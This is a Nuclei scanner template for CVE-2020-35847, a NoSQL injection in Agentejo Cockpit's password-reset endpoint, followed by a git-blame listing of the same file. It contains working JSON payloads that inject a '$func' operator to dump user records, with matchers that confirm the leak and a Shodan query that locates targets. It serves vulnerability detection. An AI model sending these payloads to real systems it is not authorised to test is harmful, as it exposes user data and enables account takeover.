nuclei-templates/http/cves/2020/CVE-2020-35847.yaml

id: CVE-2020-35847

info:
  name: Agentejo Cockpit <0.11.2 - NoSQL Injection
  author: dwisiswant0
  severity: critical
  description: |
    Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
  remediation: |
    Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/rce-cockpit-cms/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35847
    - https://getcockpit.com/
    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
    - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35847
    cwe-id: CWE-89
    epss-score: 0.74725
    epss-percentile: 0.97796
    cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: agentejo
    product: cockpit
    shodan-query: http.favicon.hash:688609340
  tags: cve,cve2020,nosqli,sqli,cockpit,injection

http:
  - raw:
      - |
        POST /auth/requestreset HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user": {
            "$func": "var_dump"
          }
        }
      - |
        POST /auth/requestreset HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user": {
            "$func": "nonexistent_function"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body_1
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'

      - type: regex
        part: body_1
        negative: true
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"'

      - type: regex
        part: body_2
        negative: true
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'

# digest: 4b0a00483046022100ea9b0e779b9635496833820800d583bce350aa6c3d3da6e8bf1e41243f0d542b022100a3da4ef3c23fe06983edc82fd4079da8dc1df3e866c41a062697ad02cffc13a7:922c64590222798bb761d5b6d8e72950
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`id: CVE-2020-35847`

			`info:`
Update CVE-2020-35847.yaml 2022-11-29 05:44:51 +00:00			`name: Agentejo Cockpit <0.11.2 - NoSQL Injection`
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`author: dwisiswant0`
			`severity: critical`
updated matchers and metadata 2023-05-25 12:55:27 +00:00			`description: \|`
			`Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`remediation: \|`
			`Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`reference:`
			`- https://swarm.ptsecurity.com/rce-cockpit-cms/`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-35847`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://getcockpit.com/`
			`- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 9.8`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-35847`
			`cwe-id: CWE-89`
templateman update 2023-10-14 11:27:55 +00:00			`epss-score: 0.74725`
TemplateMan Update [Tue Oct 31 18:27:55 UTC 2023] :robot: 2023-10-31 18:27:55 +00:00			`epss-percentile: 0.97796`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`cpe: cpe:2.3:a:agentejo:cockpit::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
TemplateMan Update [Wed Jun 21 21:03:53 UTC 2023] :robot: 2023-06-21 21:03:53 +00:00			`verified: true`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: agentejo`
			`product: cockpit`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`shodan-query: http.favicon.hash:688609340`
Dashboard Content Enhancements (#4031) Dashboard Content Enhancements 2022-04-07 13:53:15 +00:00			`tags: cve,cve2020,nosqli,sqli,cockpit,injection`
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
updated the req and matcher 2023-06-08 17:45:41 +00:00			`- raw:`
			`- \|`
			`POST /auth/requestreset HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
			`"user": {`
			`"$func": "var_dump"`
			`}`
			`}`
			`- \|`
			`POST /auth/requestreset HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/json`

			`{`
			`"user": {`
			`"$func": "nonexistent_function"`
			`}`
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`}`
Adding status matcher 2021-04-13 20:07:04 +00:00
updated matchers and metadata 2023-05-25 12:55:27 +00:00			`matchers-condition: and`
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`matchers:`
			`- type: regex`
updated the req and matcher 2023-06-08 17:45:41 +00:00			`part: body_1`
Add CVE-2020-35847 2021-04-13 19:19:41 +00:00			`regex:`
updated matchers and metadata 2023-05-25 12:55:27 +00:00			`- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'`

			`- type: regex`
updated the req and matcher 2023-06-08 17:45:41 +00:00			`part: body_1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`negative: true`
updated matchers and metadata 2023-05-25 12:55:27 +00:00			`regex:`
			`- 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"'`
Fixing false-positive in cves/2020/CVE-2020-35847.yaml 2023-05-26 07:04:17 +00:00
			`- type: regex`
updated the req and matcher 2023-06-08 17:45:41 +00:00			`part: body_2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`negative: true`
Fixing false-positive in cves/2020/CVE-2020-35847.yaml 2023-05-26 07:04:17 +00:00			`regex:`
			`- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'`
TemplateMan Update [Sun Oct 29 15:59:44 UTC 2023] :robot: 2023-10-29 15:59:44 +00:00
			`# digest: 4b0a00483046022100ea9b0e779b9635496833820800d583bce350aa6c3d3da6e8bf1e41243f0d542b022100a3da4ef3c23fe06983edc82fd4079da8dc1df3e866c41a062697ad02cffc13a7:922c64590222798bb761d5b6d8e72950`